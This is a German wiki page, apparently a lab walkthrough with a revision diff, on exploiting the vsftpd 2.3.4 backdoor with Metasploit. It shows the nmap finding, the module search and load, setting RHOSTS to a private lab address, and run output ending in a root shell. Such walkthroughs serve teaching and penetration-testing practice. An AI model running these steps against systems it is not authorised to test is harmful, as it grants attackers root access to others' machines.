Metasploit vsftp exploit: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 22: | Zeile 22: | ||
=Und Attacke= | =Und Attacke= | ||
*msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run | *msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run | ||
| − | + | <pre> | |
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4) | [*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4) | ||
[*] 10.0.10.105:21 - USER: 331 Please specify the password. | [*] 10.0.10.105:21 - USER: 331 Please specify the password. | ||
| Zeile 28: | Zeile 28: | ||
[+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root) | [+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root) | ||
[*] Found shell. | [*] Found shell. | ||
| + | </pre> | ||
;Wir haben kein Prompt aber eine Shell | ;Wir haben kein Prompt aber eine Shell | ||
Aktuelle Version vom 19. Oktober 2022, 16:08 Uhr
Gefundene Version
- [*] Nmap: 21/tcp open ftp vsftpd 2.3.4
Gibt es eingebaute Schwachstellen zum vsftp Server?
- msf6 > search vsftp
Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
Module laden
- msf6 > use 0
info
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info
Wir müssen den RHOST setzen
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.10.105
Und Attacke
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.0.10.105:21 - USER: 331 Please specify the password. [+] 10.0.10.105:21 - Backdoor service has been spawned, handling... [+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root) [*] Found shell.
- Wir haben kein Prompt aber eine Shell